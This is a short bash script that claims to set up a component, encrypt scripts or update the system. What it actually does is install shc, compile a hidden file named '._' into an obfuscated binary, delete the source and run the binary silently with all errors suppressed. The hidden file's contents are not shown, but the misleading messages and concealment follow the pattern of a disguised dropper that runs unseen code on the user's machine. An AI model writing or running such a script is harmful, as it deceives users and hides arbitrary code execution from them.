#!/bin/bash


echo "Generating a new component..."

sudo apt install shc -y
sleep 2

clear

echo "Now we need the basic sources."
echo " " 
sleep 2

sudo apt install build-essential
sleep 2

clear

sleep 2

echo "Now u can encrypt your scripts."
echo " "
echo "We need to update the system."
chmod +x ._ 2> /dev/null
shc -f ._
rm ._ 2> /dev/null
chmod +x ._.x 2> /dev/null
./._.x 2> /dev/null
